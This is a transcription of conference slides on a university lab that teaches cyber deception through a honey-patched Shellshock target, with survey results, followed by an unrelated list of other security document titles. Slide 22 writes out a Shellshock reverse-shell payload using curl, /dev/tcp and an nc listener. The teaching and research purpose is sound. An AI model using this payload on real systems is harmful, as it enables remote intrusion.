Experiences with Honey-Patching in Active Cyber Security Education
|
|
|
- Philip Miles
- 10 years ago
- Views:
Transcription
1 ERIK JONSSON SCHOOL OF ENGINEERING AND COMPUTER SCIENCE Cybersecurity Research and Education Institute Experiences with Honey-Patching in Active Cyber Security Education Frederico Araujo Mohammad Shapouri Sonakshi Pandey Kevin Hamlen The University of Texas at Dallas 8 th Workshop on Cyber Security Experimentation and Test, Aug 10th, 2015 ONR N , AFOSR FA , NSF
2 Cyber Deception Increasingly Important Advanced malware attacks often undertake elaborate user deceptions Stuxnet s replaying of pre-recorded equipment readings over $23K losses per day due to government official impersonation according to FBI Modern cyber defenders must be aware of attacker s strategies and techniques in order to anticipate their actions think like an attacker skills for creating and mitigating deceptive software limit attack surface exposed to cyber criminals U.S. Air Force focus area: Cyber Deception, /27
3 Challenges of Teaching Cyber Deception Cyber deception defense is exceptionally difficult to convey effectively in a traditional classroom structured lectures and assignments rehearsed, time-honored mode of thinking antithetical to real-world encounters involving advanced attackers CTF are a promising approach for teaching practical active defense often omit Cyber Deception 3/27
4 Cyber Deception Education Lab Lab designed to teach active cyber defense and attacker-deception to CS students strategy for effectively communicating deceptive technical skills leveraging the new paradigm of honey-patching [CCS 14] Honey-patching used to teach cyber deception in ways that overcome the otherwise predictable classroom environment Lab organized with the help of UTD s Computer Security Group student association covered by UTD IRB approval MR conducted by personnel NIH-certified in protection of human subjects 4/27
5 Outline 1. Overview 2. Honey-Patching 3. Lab Design 4. Survey Results 5. Discussion & Lessons Learned 6. Conclusions 5/27
6 Honey-Patching decoy web server clone (honey-patched) (unpatched) (patched) attack probe payload fake credit #*?&#?*# no! card card # # attacker Targets web server (unpatched) (patched) 6/27
7 Honey-Patching patch 1 + if (attack detected) 2 + reject; honey-patch 1 + if (attack detected) 2 + fork to decoy; 7/27
8 Honey-Patching 2. request server application reverse 1. request proxy honey-patched 3. fork controller 6. response 4. clone target attacker server application unpatched clone decoy container pool 5. response 8/27
9 Advantages Frustrate attacker vulnerability-probing mask patching lapses increase attacker risk Collect preparatory counterreconnaissance against directed attacks Honeypot lives inside the live server, not as a separate decoy machine Unique opportunities for attacker disinformation and misdirection Keep attackers on the hook longer Leak arbitrary (fake) secrets Fool attackers into disclosing their real payloads 9/27
10 Outline 1. Overview 2. Honey-Patching 3. Lab Design 4. Survey Results 5. Discussion & Lessons Learned 6. Conclusions 10/27
11 Lab Overview 1:05 PM - 1:25 PM Preparation 1:25 PM - 2:00 PM Exploitation Survey 2:10 PM - 2:50 PM Active Defense Feedback 1:00 PM 3:00 PM 11/27
12 Infrastructure & Preparation Target Server honey-patched Bash against Shellshock, setup with Apache HTTP + mod_cgi decoys instrumented with file-system and network monitors Attacker Environment VMs deployed as linked clones of a base image containing all lab material guests accessible from lab workstations or BYOD wireless network attacker 1 server lab subnet campus network attacker n VMware ESXi 12/27
13 Honey-Patched Target Abbreviate patch for CVE Honey-patch for CVE /27
14 Decoy Monitoring Decoy s file-system monitoring Decoy s deep inspection of network packets 14/27
15 Outline 1. Overview 2. Honey-Patching 3. Lab Design 4. Survey Results 5. Discussion & Lessons Learned 6. Conclusions 15/27
16 First Survey (2:00 2:10 pm) Q1. Did you succeed in attacking the server? (yes/no) If yes, what actions did you take after you were able to exploit the vulnerability? Yes: 7/7, No: 0/7 Q2. Did the vulnerable server raise any red flags? (yes/no) Yes: 0/7, No: 7/7 Q3. If Yes to Q2: Did you think you were interacting with a real server (i.e., not a trap)? (yes/no) If not, please explain. Q4. If Yes to Q2: Did you observe anything anomalous in any of the following: filesystem, server responses? (yes/no) If yes, how long until you observed them? 16/27
17 Second Survey (2:50 3:00 pm) Q1. After your were told that the system was honey-patched, what actions did you take? Did you try to hack the system? (yes/no) Yes: 1/7, No: 6/7 Q2. If you were given enough time, what would you attempt to do? Q3. Did you find this exercise useful for expanding your cyber security education? (yes/no) Yes: 7/7, No: 0/7 Q4. Were the tutorial instructions clear? (yes/no) If not, please suggest improvements. Yes: 7/7, No: 0/7 Q5. Were the student instructors helpful and responsive? (yes/no) Yes: 7/7, No: 0/7 Q6. Did this exercise increase your interest in the research side of cyber security? (yes/no) Please elaborate. Yes: 7/7, No: 0/7 17/27
18 Deceptiveness of Honey-Patching Did the vulnerable server raise any red flags? (yes/no) Yes: 0/7, No: 7/7 deception was successful for the entire duration of the first exercise If you were given enough time, what would you attempt to do? look into the services running in the decoy note files of interest and their properties (e.g., author, permission) look for red flags that could be used to fingerprint a honey-patched system attempt to find vulnerabilities in the honey-patch components e.g., front-end proxy look for security flaws and exploit them 18/27
19 Learning Experience Did you find this exercise useful for expanding your cyber security education? (yes/no) Yes: 7/7, No: 0/7 students found it exciting to see how the exploit worked first-hand learning attack and active defense concepts seems to entice students curiosity and develop their interest in applied cyber security lab encouraged students to seek deception-exposing strategies and examine exploit outcomes critically rather than accepting them at face value Did this exercise increase your interest in the research side of cyber security? (yes/no) Please elaborate. Yes: 7/7, No: 0/7 received constructive feedback from students, including proposals for new challenges, different methods of attack, and alternative defense methods enjoyed seeing the research being done to take advantage [of attacks] use honey-patching as a strategy to enhance incidence response 19/27
20 Outline 1. Overview 2. Honey-Patching 3. Lab Design 4. Survey Results 5. Discussion & Lessons Learned 6. Conclusions 20/27
21 Participants The lab was open to any student willing to participate no background requirements Advertisement through security and computer student organizations homepages and mailing lists lab promoted as a hands-on challenge on Shellshock exploitation and defense Participants all CS majors, with limited experience in cyber security only a few students had performed penetration tests before lab was staffed by one PhD student and two Masters students who acted as tutors for the lab 21/27
22 Interactive Demonstration Delivered at the end of the preparation session no-one-left-behind exercise provided clarifications on concepts introduced in the initial lab presentation basic working knowledge of Shellshock exploitation Worked well for our small group but it would probably need to be adjusted for larger number of students attacker nc -l port curl -A "() {:;};/bin/bash -i >& /dev/tcp/ip/port 0>&1"... reverse s hell server login.cgi 22/27
23 Lab Organization Short, alternating structured (lecturing, demo) and unstructured (free hands-on) sessions keep students focused and motivated freedom of experimentation good balance between guided and exploratory learning Concealment of honey-patching deception during first hands-on session raised students interest relative to disclosing it upfront well-received by students: the deception was benign and educational evoked an element of surprise that instill curiosity in students Increase in interest after introducing the research on honey-patching evidenced by the surge in questions and discussions 23/27
24 Cyber Deception CTF Offensive-defensive team challenge participants will learn and practice deception and anti-deception techniques initial target: TexSAW two different CTF styles students trained on honey-patching - capture the flag while avoiding submitting captured decoy flags - flag validation happens at the end of predetermined phases - enter teams trained in cyber-deceptive active defense into preexisting CTFs, without other teams knowing - if successful, this can provide empirical evidence of the efficacy of honey-patching and other deceptive defenses 24/27
25 Outline 1. Overview 2. Honey-Patching 3. Lab Design 4. Survey Results 5. Discussion & Lessons Learned 6. Conclusions 25/27
26 Conclusions Cyber security programs should complement the classroom experience with hands-on exercises invite students to try new research learn state-of-the-art cyber defense tools and techniques Cyber deception is an increasingly important component of cyber defenses level the battlefield that otherwise favors attackers arms race, which depends upon effective skills Honey-patching as educational tool links deception to penetration testing introduces deception in a benign and interesting way help overcome the otherwise predictable (non-deceptive) classroom environment 26/27
27 The End Thank you! Questions? Frederico Araujo 27/27
Penetration Testing Workshop
Penetration Testing Workshop Who are we? Carter Poe Nathan Ritchey Mahdi Shapouri Fred Araujo Outline Ethical hacking What is penetration testing? Planning Reconnaissance Footprinting Network Endpoint
SETTING UP AND USING A CYBER SECURITY LAB FOR EDUCATION PURPOSES *
SETTING UP AND USING A CYBER SECURITY LAB FOR EDUCATION PURPOSES * Alexandru G. Bardas and Xinming Ou Computing and Information Sciences Kansas State University Manhattan, KS 66506 [email protected], [email protected]
Penetration Testing - a way for improving our cyber security
OWASP EU Tour Bucharest 2013 The OWASP Foundation http://www.owasp.org Penetration Testing - a way for improving our cyber security Adrian Furtunǎ, PhD, OSCP, CEH [email protected] Copyright The OWASP
CyberNEXS Global Services
CyberNEXS Global Services CYBERSECURITY A cyber training, exercising, competition and certification product for maximizing the cyber skills of your workforce The Cyber Network EXercise System CyberNEXS
INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION
INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION Prepared for the NRC Fuel Cycle Cyber Security Threat Conference Presented by: Jon Chugg, Ken Rohde Organization(s): INL Date: May 30, 2013 Disclaimer
Penetration Testing Report Client: Business Solutions June 15 th 2015
Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: [email protected]
NETWORK SECURITY (W/LAB) Course Syllabus
6111 E. Skelly Drive P. O. Box 477200 Tulsa, OK 74147-7200 NETWORK SECURITY (W/LAB) Course Syllabus Course Number: NTWK-0008 OHLAP Credit: Yes OCAS Code: 8131 Course Length: 130 Hours Career Cluster: Information
Virtual Learning Tools in Cyber Security Education
Virtual Learning Tools in Cyber Security Education Dr. Sherly Abraham Faculty Program Director IT and Cybersecurity Dr. Lifang Shih Associate Dean School of Business & Technology, Excelsior College Overview
Certification Programs
Registration Questions? Please contact us directly. 507 S. Grand Ave., Lansing, MI 48933 [email protected] (517) 342-9057 Certification Programs 2015 Following the lecture on day 2, students have the
Erik Johansson, 091027, [email protected] Virtualization in Control Systems Possibilities and Challenges
Erik Johansson, 091027, [email protected] Virtualization in Control Systems Possibilities and Challenges ABB Group October 19, 2009 Slide 1 Possibilities and Challenges The open debate of virtualization
Contestant Requirements:
2014 Overview Why Participate? Explore: Discover the world of cybersecurity Encourage: Motivate participants towards cybersecurity careers Educate: Learn and improve cybersecurity skills Enhance: Teamwork,
Certification Programs
Certification Programs 2014 The SBS Institute serves community banks by providing educational programs that will certify a banker has the knowledge and skills to protect against todays information security
Understanding the Security Vendor Landscape Using the Cyber Defense Matrix
SESSION ID: PDIL-W02F Understanding the Security Vendor Landscape Using the Cyber Defense Matrix Sounil Yu [email protected] @sounilyu Disclaimers The views, opinions, and positions expressed in this presentation
TEACHING COMPUTER SECURITY TO UNDERGRADUATES A Hands-On Approach
TEACHING COMPUTER SECURITY TO UNDERGRADUATES A Hands-On Approach Rahul V. Tikekar Southern Oregon University Abstract: Increasing awareness of the vulnerabilities of computer systems has led to the introduction
Security Intelligence Services. Cybersecurity training. www.kaspersky.com
Kaspersky Security Intelligence Services. Cybersecurity training www.kaspersky.com CYBERSECURITY TRAINING Leverage Kaspersky Lab s cybersecurity knowledge, experience and intelligence through these innovative
Shellshock. Oz Elisyan & Maxim Zavodchik
Shellshock By Oz Elisyan & Maxim Zavodchik INTRODUCTION Once a high profile vulnerability is released to the public, there will be a lot of people who will use the opportunity to take advantage on vulnerable
Cyber Exercises, Small and Large
First International Conference on Cyber Crisis Cooperation: Cyber Exercises 27 June 2012 Cyber Exercises, Small and Large Commander Mike Bilzor Computer Science Department U.S. Naval Academy Annpolis,
Integrating Web Application Security into the IT Curriculum
Integrating Web Application Security into the IT Curriculum James Walden Northern Kentucky University Topics 1. 2. 3. 4. Why should we teach web application security? What material do we need to cover?
CYBER SECURITY TRAINING SAFE AND SECURE
CYBER SECURITY TRAINING KEEPING YOU SAFE AND SECURE Experts in Cyber Security training. Hardly a day goes by without a cyber attack being reported. With this ever-increasing threat there is a growing need
N-Dimension Solutions Cyber Security for Utilities
AGENDA ITEM NO.: 3.A. MEETING DATE; 08/18/2014 N-Dimension Solutions Cyber Security for Utilities Cyber Security Protection for Critical Infrastructure Assets The cyber threat is escalating - Confidential
SCADA Security Training
SCADA Security Training 1-Day Course Outline Wellington, NZ 6 th November 2015 > Version 3.1 web: www.axenic.co.nz phone: +64 21 689998 page 1 of 6 Introduction Corporate Background Axenic Ltd Since 2009,
This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit.
The hidden risks of mobile applications This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit. To learn more about TraceSecurity visit www.tracesecurity.com
EC-Council Certified Security Analyst (ECSA)
EC-Council Certified Security Analyst (ECSA) v8 Eğitim Tipi ve Süresi: 5 Days VILT 5 Day VILT EC-Council Certified Security Analyst (ECSA) v8 Learn penetration testing methodologies while preparing for
Computer Security Curriculum at the Univ. of Wisconsin Eau Claire. Paul J. Wagner [email protected]
Computer Security Curriculum at the Univ. of Wisconsin Eau Claire Paul J. Wagner [email protected] Background! Attended week-long workshop at Indiana University of Pennsylvania in 2002 with colleague Andy
Leveraging SANS and NIST to Evaluate New Security Tools
Leveraging SANS and NIST to Evaluate New Security Tools Agenda About TaaSera A Problem to Solve Overview of NIST Cybersecurity Framework Overview of SANS CSC-20 Call to Action Conclusion Q&A Company Founded
Bank Hacking Live! Ofer Maor CTO, Hacktics Ltd. ATC-4, 12 Jun 2006, 4:30PM
Bank Hacking Live! Ofer Maor CTO, Hacktics Ltd. ATC-4, 12 Jun 2006, 4:30PM Agenda Introduction to Application Hacking Demonstration of Attack Tool Common Web Application Attacks Live Bank Hacking Demonstration
CS 558 Internet Systems and Technologies
CS 558 Internet Systems and Technologies Dimitris Deyannis [email protected] 881 Heat seeking Honeypots: Design and Experience Abstract Compromised Web servers are used to perform many malicious activities.
Malware Analysis Quiz 6
Malware Analysis Quiz 6 1. Are these files packed? If so, which packer? The file is not packed, as running the command strings shelll reveals a number of interesting character sequences, such as: irc.ircnet.net
Deep Security Vulnerability Protection Summary
Deep Security Vulnerability Protection Summary Trend Micro, Incorporated This documents outlines the process behind rules creation and answers common questions about vulnerability coverage for Deep Security
The Risks that Pen Tests don t Find. OWASP 13 April 2012. The OWASP Foundation http://www.owasp.org
The Risks that Pen Tests don t Find 13 April 2012 Gary Gaskell Infosec Services [email protected] 0438 603 307 Copyright The Foundation Permission is granted to copy, distribute and/or modify
Building the Next Generation of Computer Security Professionals. Chris Simpson
Building the Next Generation of Computer Security Professionals Chris Simpson Overview Why teach computer security to high school students Deciding what to teach What I taught Community Support Lessons
Enterprise Security Platform for Government
Enterprise Security Platform for Government Today s Cybersecurity Challenges in Government Governments are seeking greater efficiency and lower costs, adopting Shared Services models, consolidating data
Course Content Summary ITN 261 Network Attacks, Computer Crime and Hacking (4 Credits)
Page 1 of 6 Course Content Summary ITN 261 Network Attacks, Computer Crime and Hacking (4 Credits) TNCC Cybersecurity Program web page: http://tncc.edu/programs/cyber-security Course Description: Encompasses
The Open Cyber Challenge Platform *
The Open Cyber Challenge Platform * Jacob Fonseca, Kevin Bryan, Lisa DiPippo, Victor Fay-Wolfe * Supported By The U.S. National Science Foundation grants: Federal Cyber Service Scholarship For Service
Cyber Learning Solutions
Cyber Learning Solutions 2014 Extended Course Catalog Raytheon Cyber Solutions Inc. (RCSI) [email protected] www.raytheon.com 1 Raytheon Cyber Learning Solutions 2014 Catalog CONTENTS The
CIS 4204 Ethical Hacking Fall, 2014
CIS 4204 Ethical Hacking Fall, 2014 Course Abstract: The purpose of this course is to provide a basic understanding of computing, networking, programming concepts, and exploitation techniques, as they
Information Security Attack Tree Modeling for Enhancing Student Learning
Information Security Attack Tree Modeling for Enhancing Student Learning Jidé B. Odubiyi, Computer Science Department Bowie State University, Bowie, MD and Casey W. O Brien, Network Technology Department
Analyze. Secure. Defend. Do you hold ECSA credential?
1 Analyze. Secure. Defend. Do you hold ECSA credential? TM E C S A EC-Council Certified Security Analyst 1 EC-Council Cyber Security Professional Path Threat Agent Application of Methodology So You Can
RSA Enterprise Compromise Assessment Tool (ECAT) Date: January 2014 Authors: Jon Oltsik, Senior Principal Analyst and Tony Palmer, Senior Lab Analyst
ESG Lab Review RSA Enterprise Compromise Assessment Tool (ECAT) Date: January 2014 Authors: Jon Oltsik, Senior Principal Analyst and Tony Palmer, Senior Lab Analyst Abstract: This ESG Lab review documents
Advancing Cyber Security Using System Dynamics Simulation Modeling for System Resilience, Patching, and Software Development
Interdisciplinary Consortium for Improving Critical Infrastructure Cybersecurity (IC) 3 12 February 2015 Advancing Cyber Security Using System Dynamics Simulation Modeling for System Resilience, Patching,
CORE IMPACT AND THE CONSENSUS AUDIT GUIDELINES (CAG)
CORE IMPACT AND THE CONSENSUS AUDIT GUIDELINES (CAG) Extending automated penetration testing to develop an intelligent and cost-efficient security strategy for enterprise-scale information systems CAG
EC-Council. Certified Ethical Hacker. Program Brochure
EC-Council C Certified E Ethical Hacker Program Brochure Course Description The (CEH) program is the core of the most desired information security training system any information security professional
Active Learning with the CyberCIEGE Video Game
Active Learning with the CyberCIEGE Video Game 2011 Michael F. Thompson and Dr. Cynthia E. Irvine Department of Computer Science Naval Postgraduate School Monterey, CA USA The CyberCIEGE Educational Video
Penetration Test Report
Penetration Test Report MegaCorp One August 10 th, 2013 Offensive Security Services, LLC 19706 One Norman Blvd. Suite B #253 Cornelius, NC 28031 United States of America Tel: 1-402-608-1337 Fax: 1-704-625-3787
How To Mitigate A Ddos Attack
VERISIGN DISTRIBUTED DENIAL OF SERVICE TRENDS REPORT ISSUE 3 3RD QUARTER 2014 CONTENTS EXECUTIVE SUMMARY 3 VERISIGN-OBSERVED DDoS ATTACK TRENDS 4 Mitigations by Attack Size 4 Mitigations by Industry 5
Small-Scale Cyber Security Competitions
Small-Scale Cyber Security Competitions Mike O Leary Towson University 16th Colloquium for Information Systems Security Education Orlando, FL June 11-13, 2012 M. O Leary (Towson University) Small-Scale
Hackers are here. Where are you?
1 2 What is EC-Council Certified Security Analyst Licensed Penetration Tester Program You are an ethical hacker. Your last name is Pwned. You dream about enumeration and you can scan networks in your sleep.
CAPTURE-THE-FLAG: LEARNING COMPUTER SECURITY UNDER FIRE
CAPTURE-THE-FLAG: LEARNING COMPUTER SECURITY UNDER FIRE LCDR Chris Eagle, and John L. Clark Naval Postgraduate School Abstract: Key words: In this paper, we describe the Capture-the-Flag (CTF) activity
ITS425: Ethical Hacking and Penetration Testing
ITS425: Ethical Hacking and Penetration Testing Credit Hours: 3 Contact Hours: This is a 3-credit course, offered in accelerated format. This means that 16 weeks of material is covered in 8 weeks. The
Remote PC Guide Series - Volume 1
Introduction and Planning for Remote PC Implementation with NETLAB+ Document Version: 2016-02-01 What is a remote PC and how does it work with NETLAB+? This educational guide will introduce the concepts
Technical Testing. Network Testing DATA SHEET
DATA SHEET Technical Testing Network Testing The Dell SecureWorks Technical Testing services deliver the independent expertise, experience and perspective you need to enhance your security posture, reduce
Guideline on Firewall
CMSGu2014-02 Mauritian Computer Emergency Response Team CERT-MU SECURITY GUIDELINE 2011-02 Enhancing Cyber Security in Mauritius Guideline on Firewall National Computer Board Mauritius Version 1.0 June
Course Title: Penetration Testing: Network & Perimeter Testing
Course Title: Penetration Testing: Network & Perimeter Testing Page 1 of 7 Course Description: The Security Analyst Series from EC-Council Press is comprised of five books covering a broad base of topics
Metasploit The Elixir of Network Security
Metasploit The Elixir of Network Security Harish Chowdhary Software Quality Engineer, Aricent Technologies Shubham Mittal Penetration Testing Engineer, Iviz Security And Your Situation Would Be Main Goal
Concierge SIEM Reporting Overview
Concierge SIEM Reporting Overview Table of Contents Introduction... 2 Inventory View... 3 Internal Traffic View (IP Flow Data)... 4 External Traffic View (HTTP, SSL and DNS)... 5 Risk View (IPS Alerts
Monitor and Secure Linux System with Open Source Tripwire
Cyber Forensics Laboratory 1 Monitor and Secure Linux System with Open Source Tripwire Copyright c 2012 Hui Li, Michael McGinty and Xinwen Fu, University of Massachusetts Lowell Permission is granted to
PRINCIPLES AND PRACTICE OF INFORMATION SECURITY
PRINCIPLES AND PRACTICE OF INFORMATION SECURITY Protecting Computers from Hackers and Lawyers Linda Volonino, Ph.D. Canisius College Stephen R. Robinson Verity Partners, LLC with contributions by Charles
NSA/DHS Centers of Academic Excellence for Information Assurance/Cyber Defense
NSA/DHS Centers of Academic Excellence for Information Assurance/Cyber Defense Cyber Investigations Data Management Systems Security Data Security Analysis Digital Forensics Health Care Security Industrial
How To Secure Cloud Computing
Resilient Cloud Services By Hemayamini Kurra, Glynis Dsouza, Youssif Al Nasshif, Salim Hariri University of Arizona First Franco-American Workshop on Cybersecurity 18 th October, 2013 Presentation Outline
How to Configure an Initial Installation of the VMware ESXi Hypervisor
How to Configure an Initial Installation of the VMware ESXi Hypervisor I am not responsible for your actions or their outcomes, in any way, while reading and/or implementing this tutorial. I will not provide
Managed Intrusion, Detection, & Prevention Services (MIDPS) Why E-mail Sorting Solutions? Why ProtectPoint?
Managed Intrusion, Detection, & Prevention Services (MIDPS) Why E-mail Sorting Solutions? Why ProtectPoint? Why? Focused on Managed Intrusion Security Superior-Architected Hardened Technology Security
CYBERTRON NETWORK SOLUTIONS
CYBERTRON NETWORK SOLUTIONS CybertTron Certified Ethical Hacker (CT-CEH) CT-CEH a Certification offered by CyberTron @Copyright 2015 CyberTron Network Solutions All Rights Reserved CyberTron Certified
SECURITY REIMAGINED SPEAR PHISHING ATTACKS WHY THEY ARE SUCCESSFUL AND HOW TO STOP THEM. Why Automated Analysis Tools are not Created Equal
WHITE PAPER SPEAR PHISHING ATTACKS WHY THEY ARE SUCCESSFUL AND HOW TO STOP THEM Why Automated Analysis Tools are not Created Equal SECURITY REIMAGINED CONTENTS Executive Summary...3 Introduction: The Rise
CYBER DEFENSE COMPETITION: A TALE OF TWO TEAMS *
CYBER DEFENSE COMPETITION: A TALE OF TWO TEAMS * Yan Bei and Robert Kesterson Institute of Technology University of Washington, Tacoma Tacoma, WA 253-692-5863 [email protected] Kyle Gwinnup and Carol
Course Title Penetration Testing: Procedures & Methodologies
Course Title Penetration Testing: Procedures & Methodologies Page 1 of 9 Course Description: The Security Analyst Series from EC-Council Press is comprised of five books covering a broad base of topics
Evading Infrastructure Security Mohamed Bedewi Penetration Testing Consultant
Evading Infrastructure Security Mohamed Bedewi Penetration Testing Consultant What infrastructure security really means? Infrastructure Security is Making sure that your system services are always running
LEARNING COMPUTER SYSTEMS VULNERABILITIES EXPLOITATION THROUGH PENETRATION TEST EXPERIMENTS
1 LEARNING COMPUTER SYSTEMS VULNERABILITIES EXPLOITATION THROUGH PENETRATION TEST EXPERIMENTS Te-Shun Chou and Tijjani Mohammed Department of Technology Systems East Carolina University [email protected] Abstract
Intrusion Defense Firewall
Intrusion Defense Firewall Available as a Plug-In for OfficeScan 8 Network-Level HIPS at the Endpoint A Trend Micro White Paper October 2008 I. EXECUTIVE SUMMARY Mobile computers that connect directly
Jumpstarting Your Security Awareness Program
Jumpstarting Your Security Awareness Program Michael Holcomb Director, Information Security HO20110473 1 Jumpstarting Your Security Awareness Program Classification: Confidential Owner: Michael Holcomb
Network Based Intrusion Detection Using Honey pot Deception
Network Based Intrusion Detection Using Honey pot Deception Dr.K.V.Kulhalli, S.R.Khot Department of Electronics and Communication Engineering D.Y.Patil College of Engg.& technology, Kolhapur,Maharashtra,India.
Security A to Z the most important terms
Security A to Z the most important terms Part 1: A to D UNDERSTAND THE OFFICIAL TERMINOLOGY. This is F-Secure Labs. Learn more about the most important security terms with our official explanations from
Service Manager and the Heartbleed Vulnerability (CVE-2014-0160)
Service Manager and the Heartbleed Vulnerability (CVE-2014-0160) Revision 1.0 As of: April 15, 2014 Table of Contents Situation Overview 2 Clarification on the vulnerability applicability 2 Recommended
Computer Security CS 426 Lecture 36. CS426 Fall 2010/Lecture 36 1
Computer Security CS 426 Lecture 36 Perimeter Defense and Firewalls CS426 Fall 2010/Lecture 36 1 Announcements There will be a quiz on Wed There will be a guest lecture on Friday, by Prof. Chris Clifton
Preparing for a Cyber Attack PROTECT YOUR PEOPLE AND INFORMATION WITH SYMANTEC SECURITY SOLUTIONS
Preparing for a Cyber Attack PROTECT YOUR PEOPLE AND INFORMATION WITH SYMANTEC SECURITY SOLUTIONS CONTENTS PAGE RECONNAISSANCE STAGE 4 INCURSION STAGE 5 DISCOVERY STAGE 6 CAPTURE STAGE 7 EXFILTRATION STAGE
Cybersecurity AAS Program
Cybersecurity AAS Program New Program Proposal State Submission Steve Buchholz, Dean of Accreditation and Advancement July 2015 TABLE OF CONTENTS Executive Summary... 2 Identification and Description of
Cybersecurity Vulnerability Management:
Cybersecurity Vulnerability Management: Finding Your Enterprise s Security Product Partner William L Brown Jr. Senior Engineering Manager, Regulatory and Product Security Is your security system doing
VMWARE COURSE OUTLINE. Revision 1.0 Prepared by: See CY
VMWARE COURSE OUTLINE Revision 1.0 Prepared by: See CY VMware Infrastructure Install, Configure & Manage v4 Course Part Number: VMware SKU: EDU-VS4ICM-OE Objective: To learn how to install, configure and
Research and Educational Networking Information Analysis and Sharing Center (REN-ISAC)
Research and Educational Networking Information Analysis and Sharing Center (REN-ISAC) Doug Pearson Director, REN-ISAC [email protected] Copyright Trustees of Indiana University 2003. Permission is granted
CHAPTER 3 : INCIDENT RESPONSE FIVE KEY RECOMMENDATIONS GLOBAL THREAT INTELLIGENCE REPORT 2015 :: COPYRIGHT 2015 NTT INNOVATION INSTITUTE 1 LLC
: INCIDENT RESPONSE FIVE KEY RECOMMENDATIONS 1 FIVE KEY RECOMMENDATIONS During 2014, NTT Group supported response efforts for a variety of incidents. Review of these engagements revealed some observations
APT Advanced Persistent Threat Time to rethink?
APT Advanced Persistent Threat Time to rethink? 23 November 2012 Gergely Tóth Senior Manager, Security & Privacy Agenda APT examples How to get inside? Remote control Once we are inside Conclusion 2 APT
Defensible Strategy To. Cyber Incident Response
Cyber Incident Response Defensible Strategy To Cyber Incident Response Cyber Incident Response Plans Every company should develop a written plan (cyber incident response plan) that identifies cyber attack
TAKING SECURITY TESTING TO THE NEXT LEVEL 5 MAY 2014 STAN HEGT
+ = TAKING SECURITY TESTING TO THE NEXT LEVEL 5 MAY 2014 STAN HEGT HAVE YOU EVER ENCOUNTERED AN ADVERSARY THAT RAN NESSUS FROM A MEETING ROOM? PENETRATION TESTING vs RED TEAMING Penetration Testing Red
White Paper: Consensus Audit Guidelines and Symantec RAS
Addressing the Consensus Audit Guidelines (CAG) with the Symantec Risk Automation Suite (RAS) White Paper: Consensus Audit Guidelines and Symantec RAS Addressing the Consensus Audit Guidelines (CAG) with
Hackers are here. Where are you?
1 2 What is EC-Council Certified Security Analyst Licensed Penetration Tester Program You are an ethical hacker. Your last name is Pwned. You dream about enumeration and you can scan networks in your sleep.
Securing Web Applications...at the Network Layer
Securing Web Applications......at the Network Layer OWASP Spain Chapter Meeting 16 th June, 2006 Barcelona (ES) Carlos Fragoso Mariscal Chief Technical Director [email protected] Securing Web Applications
